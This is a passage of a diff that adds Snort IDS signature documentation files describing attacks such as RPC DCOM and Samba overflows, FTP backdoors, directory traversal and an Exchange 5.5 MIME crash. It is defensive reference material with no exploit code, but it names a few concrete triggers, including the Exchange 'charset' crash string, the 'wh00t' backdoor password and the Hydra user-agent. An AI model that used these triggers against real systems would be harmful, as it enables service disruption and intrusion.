+An attacker may attempt to hide unauthorized files in a hidden directory name that begins with a space.   This hidden directory is hard to discover, permitting attackers to store unauthorized "warez" files, such as unlicensed or pirated software.
+
+--
+Affected Systems: 
+FTP servers
+
+--
+Attack Scenarios: 
+An attacker may navigate to the hidden directory name that begins with a space to list or store unauthorized files.
+
+--
+Ease of Attack: 
+Simple
+
+--
+False Positives: 
+It is remotely possible that an authorized directory exists with a name that begins with a space.
+
+--
+False Negatives: 
+Hidden directories other than those with names that begin with a space may be used to store "warez" files.
+
+--
+Corrective Action: 
+Assign restrictive permissions to all directories so unauthorized users cannot navigate or write to them.
+
+Regularly monitor directories for sudden or drastic increased use of space.
+
+--
+Contributors: 
+Original rule writer unknown
+Modified by Brian Caswell <bmc@sourcefire.com>
+Snort documentation contributed by Chaos <c@aufbix.org>
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/432.txt
@@ -0,0 +1,61 @@
+Rule:
+
+--
+
+Sid:
+432
+
+--
+
+Summary:
+This event is generated when a host generates and ICMP Type 40 Code 3 Decryption Failed datagram.
+
+--
+
+Impact:
+ICMP Type 40 Code 3 datagrams are an indication that a received datagram failed a decryption check for a given SPI.  Normally this is an indication that hosts using IP Security Protocols such as AH or ESP have been configured incorrectly or are failing to establish a session with another host.
+
+--
+
+Detailed Information:
+Hosts using IP Security Protocols such as AH or ESP generate ICMP Type 40 datagrams when a failure condition occurs.  ICMP Type 40 Code 3 datagrams are generated when a received datagram fails the decryption check for a given SPI (Security Parameters Index). 
+
+--
+
+Attack Scenarios:
+None known
+
+--
+
+Ease of Attack:
+Numerous tools and scripts can generate this type of ICMP datagram.
+
+--
+
+False Positives:
+None known
+
+--
+
+False Negatives:
+None known
+
+--
+
+Corrective Action:
+ICMP Type 40 datagrams not normally seen on the network.  Currently Sourcefire is unaware of any hardware that has implemented these types of ICMP datagrams.  Hosts generating these types of ICMP datagrams should be investigated for nefarious activity or configuration errors. 
+
+--
+
+Contributors:
+Original Rule writer unknown
+Sourcefire Research Team
+Matthew Watchinski (matt.watchinski@sourcefire.com)
+
+--
+
+Additional References:
+RFC2521
+
+
+--
--- /dev/null
+++ b/doc/signatures/2534.txt
@@ -0,0 +1,61 @@
+Rule:
+
+--
+Sid:
+2534
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in the Microsoft implementation of SSL Version 3.
+
+--
+Impact:
+Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in the handling of SSL Version 3 requests that
+can be manipulated to cause a DoS condition in various software 
+implementations used on Microsoft operating systems.
+
+The condition exists because of poor error handling routines in the
+Microsoft Secure Sockets Layer (SSL) library. SSL requests containing an
+invalid field, sent to vulnerable systems can cause the affected host to stop 
+handling any further requests.
+
+--
+Affected Systems:
+	Microsoft Windows 2000, 2003 and XP systems using SSL
+
+--
+Attack Scenarios:
+An attcker needs to make an SSL request to an affected system that
+contains an invalid field.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches
+
+--
+Contributors:
+Sourcefire Research Team
+Matt Watchinski <mwatchinski@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/3316.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3316
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/3034.txt
@@ -0,0 +1,67 @@
+Rule: 
+
+--
+Sid: 
+3034
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in a Samba implementation.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code.
+
+--
+Detailed Information:
+Samba is a file and print serving system for heterogenous networks. It
+is available for use as a service and client on UNIX/Linux systems and as
+a client for Microsoft Windows systems.
+
+Samba uses the SMB/CIFS protocols to allow communication between client
+and server. The SMB protocol contains many commands and is commonly used
+to control network devices and systems from a remote location. A
+vulnerability exists in the way the smb daemon processes commands sent by
+a client system when accessing resources on the remote server.The problem
+exists in the allocation of memory which can be exploited by an attacker
+to cause an integer overflow, possibly leading to the execution of
+arbitrary code on the affected system with the privileges of the user
+running the smbd process.
+
+--
+Affected Systems:
+	Samba 3.0.8 and prior
+
+--
+Attack Scenarios: 
+An attacker needs to supply specially crafted data to the smb daemon to
+overflow a buffer containing the information for the access control lists
+to be applied to files in the smb query.
+
+-- 
+Ease of Attack: 
+Difficult.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1919.txt
@@ -0,0 +1,59 @@
+Rule:
+--
+Sid:
+1919
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a buffer overflow or denial of service vulnerability associated with FTP CWD command. 
+
+--
+Impact:
+Remote access or denial of service.  A successful attack can cause a denial of service or allow remote execution of arbitrary commands with privileges of the process running the FTP server. 
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit various vulnerabilities associated with the FTP CWD command of different FTP servers. It is possible to cause a denial of service attack or gain remote access to execute arbitrary commands with the privileges of the process running the FTP server by sending an overly long argument with the FTP CWD command. 
+
+--
+Affected Systems:
+Hosts running BlackMoon FTP Server 1.0 through 1.5. 
+Hosts running Argosoft FRP server 1.0.
+Hosts running TYPSoft FTP Server 0.7x. 
+
+--
+Attack Scenarios:
+An attacker can supply an overly long file argument with the CWD command, causing a denial of service or buffer overflow.
+
+--
+Ease of Attack:
+Simple.  
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com> 
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+CVE:
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2002-0126
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2000-1194
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2000-1035
+
+--
--- /dev/null
+++ b/doc/signatures/386.txt
@@ -0,0 +1,60 @@
+Rule:
+
+--
+Sid:
+386
+
+--
+Summary:
+This event is generated when an internal server replies to an external request for network subnet mask information, which may allow an attacker to learn information about the network for use in later attacks. 
+
+--
+Impact:
+Information gathering.
+
+--
+Detailed Information:
+If an attacker sends an ICMP request to an internal server for address mask information (SID 388 should trigger when this activity is seen), an internal server may reply with subnet mask information.  This can provide an attacker with information about subnet mask configuration that can be useful for future attacks.
+
+--
+Affected Systems:
+Any system that responds to ICMP address mask requests.
+
+--
+Attack Scenarios:
+An attacker can send an ICMP request for subnet mask information to the internal network. The server replies, providing the attacker with information about network subnet configuration.
+
+--
+Ease of Attack:
+Simple. Tools that use this method of information gathering are freely available.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Use a packet filtering firewall that restricts ICMP type 17 (address mask requests) from entering the protected network, and restricts ICMP type 18 packets (address mask replies) from exiting the protected network.
+
+--
+Contributors:
+Original rule writer unknown
+Sourcefire Research Team
+Matthew Watchinski <matt.watchinski@sourcefire.com>
+Sourcefire Technical Publications Team
+Jen Harvey <jennifer.harvey@sourcefire.com>
+
+--
+Additional References:
+
+CVE
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-1999-0524
+
+ArachNIDS
+http://www.whitehats.com/cgi/arachNIDS/Show?_id=ids216
+
+--
--- /dev/null
+++ b/doc/signatures/100000168.txt
@@ -0,0 +1,59 @@
+Rule: 
+
+--
+Sid: 
+100000168
+
+-- 
+Summary: 
+The password-cracking tool Hydra has been detected in HTTP traffic.
+
+--
+Impact:
+An attacker may be attempting to break into one or more web servers monitored 
+by Snort via a brute-force password attack. If successful, the attacker may 
+gain unauthorized access to internal networks.
+
+--
+Detailed Information:
+Hydra is a password-cracking tool released by a group of security experts 
+called THC, "The Hacker's Choice." Requests sent by this tool to a web server 
+contain the User-Agent string "Mozilla/4.0 (Hydra)". Since normal browsers' 
+User-Agent strings do not contain the string "(Hydra)", the presence of this 
+string indicates that the Hydra tool is likely being used.
+
+--
+Affected Systems:
+Any system running a web server.
+
+--
+Attack Scenarios:
+Attackers will use the Hydra password-cracking tool.
+
+--
+Ease of Attack:
+Simple, as the program is publicly available and is well-documented.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Check system logs and Snort alert logs for suspicious activity, particularly 
+unusual logons. Ensure that secure passwords are being used throughout your 
+network.
+
+--
+Contributors:
+rmkml
+Sourcefire Research Team
+
+--
+Additional References
+
+--
--- /dev/null
+++ b/doc/signatures/100000146.txt
@@ -0,0 +1,62 @@
+Rule:
+
+--
+Sid:
+100000146
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a
+directory traversal associated with Imail Web Calendaring
+servicel
+
+--
+Impact:
+A successful attack can permit a user to navigate outside
+of the web root directory and read files.
+
+--
+Detailed Information:
+The Imail Web Calendaring Server does not properly sanitize
+a malformed URL that contains directory traversal characters.
+This vulnerability is associated with static objects identified
+by names ending in .jsp, .jpg, .gif, .wav, .css, or .htm.  This
+can permit an unauthorized user to examine files that may contain
+sensitive information.
+
+--
+Affected Systems:
+Ipswitch IMail Server 8.2 and prior
+Ipswitch IMail Server 8.15 and prior
+
+--
+Attack Scenarios:
+An attacker send a URI containing a directory traversal to view
+sensitive files on a vulnerable server.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Upgrade to the most current non-affected version of the product.
+
+--
+Contributors:
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References
+Other:
+
+--
--- /dev/null
+++ b/doc/signatures/355.txt
@@ -0,0 +1,64 @@
+Rule:
+
+--
+Sid:
+355
+
+--
+Summary:
+This event is generated when a password of "wh00t" is used to login to an File Transfer Protocol (FTP) server.
+
+--
+Impact:
+Remote root access.  The attack may indicate that the FTP server has been compromised. 
+
+--
+Detailed Information:
+The password "wh00t" is a common backdoor password associated with a compromised root account.  If this password is observed, it may indicate that the FTP server has been compromised and a backdoor root account with a password of "wh00t" has been created.  Alternately, this may indicate a failed attempt of an attacker attempting to locate FTP servers compromised by others. 
+
+--
+Affected Systems:
+FTP servers.
+
+--
+Attack Scenarios:
+An attacker may compromise a host and create a backdoor account.  An attacker may attempt to locate FTP servers with a backdoor account.
+
+--
+Ease of Attack:
+Simple
+
+--
+False Positives:
+It is very remotely possible that a legitimate password of "wh00t" exists.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Examine the suspected compromised host for unauthorized changes.
+
+Make sure that the suspected compromised host has all security patches applied.
+
+Log activity to and from the suspected compromised host.
+
+Examine other systems on the network for evidence of compromise.
+
+If a compromised is discovered, reinstall the operating system.
+
+--
+Contributors:
+Orignal rule written by Ron Gula <rgula@tenablesecurity.com>
+Documented by Steven Alexander<alexander.s@mccd.edu>
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+Arachnids:
+http://www.whitehats.com/info/IDS324
+
+--
--- /dev/null
+++ b/doc/signatures/100000550.txt
@@ -0,0 +1,71 @@
+Rule:
+
+--
+Sid:
+100000550
+--
+Summary:
+This event is generated when an attempt is made to access the file "comment.php 
+which contains known vulnerabilities in the "Project Eros BBSEngine" 
+application running on a webserver.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to access a file with known 
+vulnerabilities from a remote machine used by the "Project Eros BBSEngine" 
+application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to execute system binaries or malicious code of the 
+attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to 
+a CGI application running ona web server. Some applications do not perform 
+stringent checks when validating the credentials of a client host connecting to 
+the services offered on a host server. This can lead to unauthorized access and 
+possibly escalated privileges to that of the administrator. Data stored on the 
+machine can be compromised and trust relationships between the victim server 
+and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Project Eros BBSEngine
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own 
+credentials to gain access. Alternatively the attacker can exploit weaknesses 
+to gain access as the administrator by supplying input of their choosing to the 
+underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
--- /dev/null
+++ b/doc/signatures/3428.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3428
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1571.txt
@@ -0,0 +1,64 @@
+Rule:  
+
+--
+Sid:
+1571
+
+--
+Summary:
+This event is generated when an attempt is made to execute a directory
+traversal attack.
+
+--
+Impact:
+Information disclosure. This is a directory traversal attempt which can
+lead to information disclosure and possible exposure of sensitive
+system information.
+
+--
+Detailed Information:
+Directory traversal attacks usually target web, web applications and ftp
+servers that do not correctly check the path to a file when requested by
+the client.
+
+This can lead to the disclosure of sensitive system information which may
+be used by an attacker to further compromise the system.
+
+--
+Affected Systems:
+
+--
+Attack Scenarios:
+An authorized user or anonymous user can use the directory traversal 
+technique, to browse folders outside the ftp root directory. Information
+gathered may be used in further attacks against the host.
+
+--
+Ease of Attack:
+Simple. No exploit software required.
+
+--
+False Positives:
+None known
+
+--
+False Negatives:
+None known
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches
+
+Upgrade the software to the latest non-affected version.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+
+--
--- /dev/null
+++ b/doc/signatures/658.txt
@@ -0,0 +1,59 @@
+Rule:
+
+--
+Sid:
+658
+
+--
+Summary:
+This event is generated when a denial of service is attempted on a Microsoft Exchange mail server.
+
+--
+Impact:
+Denial of service.  This will cause the Exchange server to fail.  
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft Exchange 5.5 that causes a denial of service if a MIME header contains the string 'charset = ""'.  The Exchange server does not properly handle this MIME header string, causing it to crash.
+
+--
+Affected Systems:
+Microsoft Exchange server 5.5
+
+--
+Attack Scenarios:
+An attacker can supply a malicious string in the MIME header causing the Exchange server to fail. 
+
+--
+Ease of Attack:
+Easy.  An attacker can telnet to port 25 of the Exchange server, start a dialogue with the server, and supply the malicious string in the MIME header.
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Apply the appropriate patch or upgrade to Exchange 5.5 service Pack 4.
+
+--
+Contributors:
+Original rule writer unknown
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+Microsoft:
+http://www.microsoft.com/technet/treeview/default.asp?url=/technet/security/bulletin/ms00-082.asp 
+
+Miscellaneous:
+http://packetstormsecurity.nl/0011-exploits/exchange.dos.txt
+
+
+--
--- /dev/null
+++ b/doc/signatures/100000778.txt
@@ -0,0 +1,56 @@
+
+
+Rule:
+
+--
+Sid:
+100000778
+--
+Summary:
+This event is generated when an attempt is made to exploit a cross site scripting vulnerability in the "PHPMailList" application running on a webserver.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to exploit a cross site scripting vulnerability via the "email" parameter in the "maillist.php" script used by the "PHPMailList" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to retrieve sensitive data, execute system binaries or malicious code of the attackers choosing.
+
+--
+Affected Systems:
+All systems running CGI applications using PHPMailList
+--
+Attack Scenarios:
+An attacker can supply a malicious link designed to steal information from a user clicking on that link.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+The Cross Site Scripting (XSS) FAQ
+http://www.cgisecurity.com/articles/xss-faq.shtml
+
+--
+
--- /dev/null
+++ b/doc/signatures/100000500.txt
@@ -0,0 +1,72 @@
+Rule:
+
+--
+Sid:
+100000500
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file 
+include vulnerability in the "PictureDis" application running on a webserver. 
+Access to the file "wpfiles.php" using a remote file being passed as the "lang" 
+parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a 
+remote machine via the "lang" parameter in the "wpfiles.php" script used by the 
+"PictureDis" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to execute system binaries or malicious code of the 
+attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to 
+a CGI application running ona web server. Some applications do not perform 
+stringent checks when validating the credentials of a client host connecting to 
+the services offered on a host server. This can lead to unauthorized access and 
+possibly escalated privileges to that of the administrator. Data stored on the 
+machine can be compromised and trust relationships between the victim server 
+and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using PictureDis
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own 
+credentials to gain access. Alternatively the attacker can exploit weaknesses 
+to gain access as the administrator by supplying input of their choosing to the 
+underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
--- /dev/null
+++ b/doc/signatures/2177.txt
@@ -0,0 +1,63 @@
+Rule:
+
+--
+Sid:
+2176
+
+
+--
+Summary:
+This event is generated when an attempt is made to access a system
+folder via SMB. 
+
+--
+Impact:
+Serious. This folder contains important operating system information.
+
+--
+Detailed Information:
+This event indicates that an attempt was made to access a folder
+containing important operating system files using SMB across the
+network.
+
+--
+Affected Systems:
+Microsoft Windows systems.
+
+--
+Attack Scenarios:
+If this folder is accessible via SMB the attacker can replace or view
+important operating system files.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Check the host for signs of system compromise.
+
+Turn off file and print sharing on the target host.
+
+Use a packet filtering firewall to disallow SMB access to the host from
+sources external to the protected network.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+
+--
--- /dev/null
+++ b/doc/signatures/2495.txt
@@ -0,0 +1,61 @@
+Rule:
+
+--
+Sid:
+2495
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in the Microsoft RPC service.
+
+--
+Impact:
+Denial of Service (DoS). Possible execution of arbitrary code leading to
+unauthorized remote access to the victim host.
+
+--
+Detailed Information:
+It may be possible for an attacker to cause a DoS condition in the
+Microsoft RPC service when multiple simultaneous requests are made to a
+vulnerable host. This can lead to an exhaustion of system resources
+causing the DoS.
+
+--
+Affected Systems:
+	Windows systems running RPC services
+
+--
+Attack Scenarios:
+An attacker may attempt to bind to the RPC service many times in an
+attempt to cause the DoS condition to occur.
+
+--
+Ease of Attack:
+Difficult.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+Apply the appropriate vendor supplied patches
+
+--
+Contributors:
+Sourcefire Research Team
+Matt Watchinski <mwatchinski@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/3343.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3343
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/100000315.txt
@@ -0,0 +1,71 @@
+Rule:  
+
+--
+Sid:
+100000315
+
+--
+Summary:
+This event is generated when an HTTP client issues a PUT request to upload
+a document into the web content area.
+
+--
+Impact:
+The PUT method is a legitimate HTTP command that allows an authorized user
+to upload a document into the web content tree. It is most often associated 
+with the WebDAV content management protocol.  
+
+Although there are some legitimate uses for the PUT method, it is also a
+frequent source of web site defacement, as attackers can easily abuse 
+misconfigured web servers that allow unrestricted PUT functionality from 
+arbitrary users.
+
+--
+Detailed Information:
+The rule searches for HTTP requests using the PUT method, and tracks 
+these sessions.  The rule is intended to be used with SID 100000316 to 
+track successful PUT requests, which may represent successful defacement
+attacks, instead of all PUT requests.
+
+Administrators who wish to track all PUT requests (successful or not) should 
+remove the "flowbits:noalert;" section of this rule.
+
+--
+Affected Systems:
+Any web server
+
+--
+Attack Scenarios:
+An attacker can issue a PUT reuqest via a script, many different pieces of 
+software, or through a manual connection to any web server port.
+
+--
+Ease of Attack:
+Simple.  Numerous tools exist for creating PUT requests, including some geared
+specifically towards web site defacement.  
+
+--
+False Positives:
+Organizations that use WebDAV to manage their web content may experience
+false positives, as the PUT method is a normal part of the WebDAV protocol.
+Additionally, any other legitimate web applications which use the PUT method
+will generate false positives.
+
+--
+False Negatives:
+None
+
+--
+Corrective Action:
+In cases of web site defacement, delete the newly-created file(s) and/or 
+restore them from a reliable backup. In all cases, be sure to tune web server
+configuration to allow PUT requests only where necessary for a legitimate web
+application to function.
+
+--
+Contributors:
+David J. Bianco, <david@vorant.com>
+
+-- 
+Additional References:
+http://www.w3.org/Protocols/rfc2616/rfc2616-sec9.html#sec9.6
--- /dev/null
+++ b/doc/signatures/2378.txt
@@ -0,0 +1,64 @@
+Rule:  
+
+--
+Sid:
+2378
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in Checkpoint VPN-1.
+
+--
+Impact:
+Unauthorized administrative access to Checkpoint VPN-1 systems
+
+--
+Detailed Information:
+Checkpoint VPN-1, SecuRemote and SecureClient contain an error that
+affects the processing of large Certificate requests to the VPN service.
+By sending a large amount of data in the Certificate Request payload an
+attacker may cause a buffer overflow condition to occur, presenting an
+opportunity to execute code of their choosing with the privileges of the
+user running the service, usually root.
+
+--
+Affected Systems:
+	CheckPoint Software FW-1 1.4.1 Service packs prior to SP6
+	CheckPoint Software FW-1 Next Generation FP1, FP0
+	CheckPoint Software VPN-1 1.4.1 SP5a
+	CheckPoint Software VPN-1 Next Generation FP1, FP0
+
+--
+Attack Scenarios:
+An attacker could supply a large Certificate Request payload containing
+code to be executed on the system.
+
+--
+Ease of Attack:
+Proof of concept code exists.
+
+--
+False Positives:
+None known
+
+--
+False Negatives:
+None known
+
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software
+
+Apply the appropriate vendor supplied patches
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/3172.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3172
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/642.txt
@@ -0,0 +1,62 @@
+Rule: 
+
+--
+Sid: 642
+
+--
+Summary: 
+This event is generated when a buffer overflow attack is attempted against a target machine.
+
+--
+Impact: 
+Serious. The attacker may be able to gain remote access to the system or have the ability to execute arbitrary code with the privileges of a system user.
+
+
